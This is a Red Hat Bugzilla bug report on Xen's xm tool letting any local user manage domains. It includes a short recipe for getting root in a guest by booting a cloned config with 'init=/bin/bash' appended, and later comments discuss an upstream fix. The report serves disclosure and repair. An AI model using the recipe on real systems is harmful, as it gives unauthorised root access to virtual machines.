Red Hat Bugzilla – Bug 161200
Any local user can create/destroy/... domains and attach to their consoles
Last modified: 2007-11-30 17:11:08 EST
Description of problem:
Any user can use "/usr/sbin/xm [list|create|console|shutdown|destroy|...]"
without additional authentication, even with selinux activated.
You can even clone a domain config into /tmp, append
extra +=" init=/bin/bash"
and gain rootaccess to that domain by shutting it down and booting it with the
evil clone config.
Version-Release number of selected component (if applicable):
Steps to Reproduce:
Login as local user (uid!=0) and manage doamins with "/usr/sbin/xm".
You can do whatever you want.
Only root (or a configurable special user/group) can manage domains.
This is a known issue. I do not know if it is already fixed completely
upstream, but as xen moved from tcp sockets to unix sockets for xm/xend
communication, it should be easy to fix.
At least with the aid of selinux.
I am not sure if this is still relevant with the unix sockets model, but SuSE
did something about this security issue, read chapter "Security" here:
"We changed the xend to observe the xend-privileged-port setting (in
xend-config.sxp). If it's set to 1, xend will only accept configuration
commands from ports below 1024. Together with only binding to localhost,
this should provide a minimum of security against local users to change
I agree that this should be improved, but IMHO it should be improved in the
upstream Xen code base and not forked in a distribution package.
I think Xen fixed the issue upstream, so I will upgrade the package in rawhide soon.
This should be fixed in current Xen 3, and I can't reproduce on FC5test releases.